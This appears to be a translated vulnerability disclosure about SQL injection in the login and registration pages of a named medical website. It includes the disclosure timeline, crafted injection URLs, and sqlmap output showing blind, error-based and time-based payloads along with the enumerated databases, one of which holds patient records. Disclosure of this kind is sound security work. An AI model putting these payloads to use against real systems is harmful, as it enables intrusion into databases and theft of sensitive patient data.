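2015-04-19: Details reported to the vendor; awaiting vendor handling
2015-04-20: Vendor confirmed; details disclosed to the vendor only
2015-04-30: Details disclosed to core white hats and experts in the relevant field
2015-05-10: Details disclosed to regular white hats
2015-05-20: Details disclosed to intern white hats
2015-06-04: Details disclosed to the public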
The data is sent out via GET. Far too insecure.
http://endop.medlive.cn/ac-usercenter/login.html?date=Fri%20Apr%2017%202015%2011:00:08%20GMT+0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)&submit_type=ajax&method=login&remmberme=0&username=23&password=23
http://endop.medlive.cn/ac-usercenter/register.html?method=checkexist&submit_type=ajax&type=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(120)%2cCHAR(56)%2cCHAR(73)%2cCHAR(80)%2cCHAR(72)%2cCHAR(104)%2cCHAR(113)%2cCHAR(113))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&value=e
Login page: parameter username
Registration page: parameters type, value
---
Parameter: username (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: date=Fri Apr 17 2015 11:00:08 GMT 0800 (%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)&submit_type=ajax&method=login&remmberme=0&username=23' RLIKE (SELECT (CASE WHEN (7770=7770) THEN 23 ELSE 0x28 END)) AND 'FtVh'='FtVh&password=23

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: date=Fri Apr 17 2015 11:00:08 GMT 0800 (%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)&submit_type=ajax&method=login&remmberme=0&username=23' AND (SELECT 7910 FROM(SELECT COUNT(*),CONCAT(0x71767a7871,(SELECT (ELT(7910=7910,1))),0x7170627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xjTj'='xjTj&password=23

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: date=Fri Apr 17 2015 11:00:08 GMT 0800 (%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)&submit_type=ajax&method=login&remmberme=0&username=23' AND (SELECT * FROM (SELECT(SLEEP(5)))vfAJ) AND 'VrTy'='VrTy&password=23
---
web application technology: Apache 2.2.14
back-end DBMS: MySQL 5.0
available databases [3]:
[*] endu
[*] endu_patient
[*] information_schema

Database: endu
[110 tables]
Fix urgently!
Severity: High
Vulnerability Rank: 20
Confirmation time: 2015-04-20 09:07
We are fixing this urgently.
None yet